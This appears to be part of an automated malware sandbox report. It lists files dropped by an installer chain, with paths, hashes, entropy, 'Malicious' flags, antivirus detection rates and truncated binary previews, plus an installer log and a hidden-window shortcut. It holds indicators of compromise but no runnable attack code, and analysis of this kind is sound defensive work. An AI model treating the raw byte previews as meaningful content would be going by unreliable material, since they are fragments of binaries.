                                                                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3::
                                                                                                                                                                                                                                    MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                                                                                                                                                                    SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                                                                                                                                                                    SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                                                                                                                                                                    SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):410
                                                                                                                                                                                                                                    Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
                                                                                                                                                                                                                                    MD5:812F0A8C671812AA613FC139B69E8614
                                                                                                                                                                                                                                    SHA1:B4177437C50B25B06FB885362DA36FD171A1C5A9
                                                                                                                                                                                                                                    SHA-256:6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
                                                                                                                                                                                                                                    SHA-512:6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):545792
                                                                                                                                                                                                                                    Entropy (8bit):6.384805269039956
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
                                                                                                                                                                                                                                    MD5:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                                                                                                    SHA1:D5927B38A32E30AFCF5A658612A8266476FC4AD8
                                                                                                                                                                                                                                    SHA-256:64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
                                                                                                                                                                                                                                    SHA-512:355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1514213
                                                                                                                                                                                                                                    Entropy (8bit):7.753986100430612
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:wl943dyt0CxCz0E00hQ1JwJp/rFEHoRy9SGj/8cvPOp3G+1Jp7x+bY31EIstMnjv:I63dGMZ0cGwJpjFEHoRyUG78qPOpTJVb
                                                                                                                                                                                                                                    MD5:DD4C66641F3A216A6925C1106D0714B4
                                                                                                                                                                                                                                    SHA1:34ACE672B58368A3C2BBB7842A64CEC2317EA9B0
                                                                                                                                                                                                                                    SHA-256:281706847FEBB930DCE18257991BB8724A7F4FEDADE40D34A606A878AE4EB261
                                                                                                                                                                                                                                    SHA-512:BC3DCB2858B3E2BE3B9CB7822660CE0DA3D88AF35E020A17CD8D79DBFBD46C2845034162E9BAD79B53459694AA3E8FE3A92E88C74C809FBEDCC60D29BBED8DCF
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:>C&.<C&.=C&.=C&.<C&..C&.)C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C'...v.y.r...k.^1I.R%R.j*H.R4U.n7G.Ick.S6z.O,A.\.U.n7G.I6V.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.~,o.T7O.Q*\.x;&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.~,e.X"R.t-U.\-E.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&...o.y.t.a.O.O,U.[7..x.z.O"K.J,T.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.Kq...v...t&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1514213
                                                                                                                                                                                                                                    Entropy (8bit):7.753984731987231
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:7l943dyt0CxCz0E00hQ1JwJp/rFEHoRy9SGj/8cvPOp3G+1Jp7x+bY31EIstMnjv:p63dGMZ0cGwJpjFEHoRyUG78qPOpTJVb
                                                                                                                                                                                                                                    MD5:2CB9DA0B7AAB0FFD6D1F0EA71268C695
                                                                                                                                                                                                                                    SHA1:573533ADFA856C26BA524235B8910462E93F0525
                                                                                                                                                                                                                                    SHA-256:1FAA63E69538280D06D5DAF8BA1A3BBCB69C08CEFC566FB4CFCFB2ECC50A51E1
                                                                                                                                                                                                                                    SHA-512:FFCE129B25C2BC051BCD3757D349A4251D29A778C3F3EAEF48A725ADC69394D95D48872A90364738078FE1C0DAA0631898D90D36989FAE278FA691E2E4A4AACD
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:>C&.<C&.=C&.=C&.<C&..C&.)C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C'...v.y.r...k.^1I.R%R.j*H.R4U.n7G.Ick.S6z.O,A.\.U.n7G.I6V.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.~,o.T7O.Q*\.x;&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.~,e.X"R.t-U.\-E.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&...o.y.t.a.O.O,U.[7..x.z.O"K.J,T.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.Kq...v...t&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):545792
                                                                                                                                                                                                                                    Entropy (8bit):6.384805269039956
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
                                                                                                                                                                                                                                    MD5:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                                                                                                    SHA1:D5927B38A32E30AFCF5A658612A8266476FC4AD8
                                                                                                                                                                                                                                    SHA-256:64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
                                                                                                                                                                                                                                    SHA-512:355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.3.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4718
                                                                                                                                                                                                                                    Entropy (8bit):5.4831065547536815
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:EJuy6ePkmFdRN9QAiMPZPZPZPZPKPKPEPEPEPEP1P1P1P50uPf2C:W3PkmFdRN9QAiMPZPZPZPZPKPKPEPEPv
                                                                                                                                                                                                                                    MD5:B94233986DB09F6CF022E905B73861A6
                                                                                                                                                                                                                                    SHA1:6627B31AD08384B64F156546B19727A63BBDBE39
                                                                                                                                                                                                                                    SHA-256:9F0FF0A77A4C1C9754884B217661538E546AA0412D3D05673C3D698654FB793E
                                                                                                                                                                                                                                    SHA-512:8F83106B430ED8CE360D4247B0F03EE7EF1970B328720E0E713C6A23D9E6214F8963E314A8A99BF3BD672E99E249F1D84FCCBD23E042881C02E10320DB40042B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:[04/27/24 01:31:56] Main : OS Version = osWin10...[04/27/24 01:31:56] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/27/24 01:32:00] Installer Target URL request = {"IPAddress":"192.168.2.4","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/27/24 01:32:01] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/27/24 01:32:01] DownloadAndLaunchInstaller : Creating BITS download handler...[04/27/24 01:32:01] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/27/24 01:32:01] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/27/24 01:32:01] DownloadAndLaunchInstaller : Target folder ="C:\User
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 22:31:28 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1063
                                                                                                                                                                                                                                    Entropy (8bit):4.991177146276046
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:85J4mCkoiMXROgK8I5PGr90yAjfKPKr2snqyFm:8RCkuXRvy7RjVEyF
                                                                                                                                                                                                                                    MD5:43B7EB3FDD814ED3F812E75F06C958DE
                                                                                                                                                                                                                                    SHA1:FA758084AFAAB30A8CEAE84D88838A712F3E7C9D
                                                                                                                                                                                                                                    SHA-256:EF31853CEE1A15DCCDC04203E94E0C5CB9CF8E4CA929090B3FA5555589A02688
                                                                                                                                                                                                                                    SHA-512:F939EBC0FCC6D596BF13ACB38C65027C6A563E72F23B02F050FC898705902665D2589E2544810DB118433E2EADF6E055029C725C136025C781F2FEFF3BF5B760
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:L..................F.... ....Z.!......1....Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&......vk.v....K.$.1...h4..1.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X............................%..A.p.p.D.a.t.a...B.P.1......X...Local.<......CW.^.X.....b.........................L.o.c.a.l.....N.1......X...Temp..:......CW.^.X.....l....................._.H.T.e.m.p.....T.1......X...u5qk.2..>......X.X.....D......................_..u.5.q.k...2.....V.2.0.%..X./ .run.exe.@......X./.X..............................r.u.n...e.x.e......._...............-.......^...................C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe......\.u.5.q.k...2.\.r.u.n...e.x.e.........|....I.J.H..K..:...`.......X.......971342...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9.
